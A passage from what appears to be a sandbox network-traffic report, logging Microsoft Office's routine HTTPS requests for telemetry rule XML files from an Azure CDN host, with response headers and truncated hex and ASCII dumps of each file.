                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                116192.168.2.55556213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:13 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:13 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:13 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1399
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                ETag: "0x8DC582BE8C605FF"
                                                                                x-ms-request-id: 831f1653-b01e-0098-198c-15cead000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093413Z-15767c5fc554wklc0x4mc5pq0w0000000chg00000000bge4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:13 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                117192.168.2.55556413.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:13 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:13 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:13 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1366
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                ETag: "0x8DC582BEA414B16"
                                                                                x-ms-request-id: a7582d38-101e-0028-528c-158f64000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093413Z-15767c5fc55rv8zjq9dg0musxg0000000cbg000000004ehq
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:13 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                118192.168.2.55556313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:13 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:13 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:13 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1362
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                ETag: "0x8DC582BDF497570"
                                                                                x-ms-request-id: 7585955c-001e-000b-518c-1515a7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093413Z-15767c5fc55whfstvfw43u8fp40000000cb000000000ba4x
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:13 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                119192.168.2.55555713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:13 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:13 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:13 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1366
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                ETag: "0x8DC582BDF1E2608"
                                                                                x-ms-request-id: fb0d4061-601e-0050-198c-152c9c000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093413Z-15767c5fc55tsfp92w7yna557w0000000ca0000000007a3h
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:13 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                120192.168.2.55556613.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:13 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:13 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:13 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1403
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                ETag: "0x8DC582BDC2EEE03"
                                                                                x-ms-request-id: 89fd357a-501e-008f-758c-159054000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093413Z-15767c5fc55qkvj6n60pxm9mbw00000001f00000000073an
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:13 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                121192.168.2.55557013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:14 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1362
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                ETag: "0x8DC582BEB256F43"
                                                                                x-ms-request-id: 757cff4f-401e-000a-528c-154a7b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc554w2fgapsyvy8ua00000000btg000000007bqm
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                122192.168.2.55556913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:14 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1399
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                ETag: "0x8DC582BE1CC18CD"
                                                                                x-ms-request-id: a68e0dd8-f01e-0052-1d8c-159224000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc55rv8zjq9dg0musxg0000000cf000000000016v
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                123192.168.2.55557213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:14 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1366
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                ETag: "0x8DC582BE5B7B174"
                                                                                x-ms-request-id: 9bed7ce1-001e-0046-4f8c-15da4b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc554w2fgapsyvy8ua00000000bw0000000003wv7
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                124192.168.2.55557113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:14 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1403
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                ETag: "0x8DC582BEB866CDB"
                                                                                x-ms-request-id: b2395a75-501e-005b-038c-15d7f7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc55qkvj6n60pxm9mbw00000001kg00000000215w
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                125192.168.2.55557513.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:14 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1399
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                ETag: "0x8DC582BE976026E"
                                                                                x-ms-request-id: 7baaa16d-b01e-0097-4d8c-154f33000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc55rg5b7sh1vuv8t7n0000000cm0000000009cc2
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                126192.168.2.55558113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:14 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1415
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
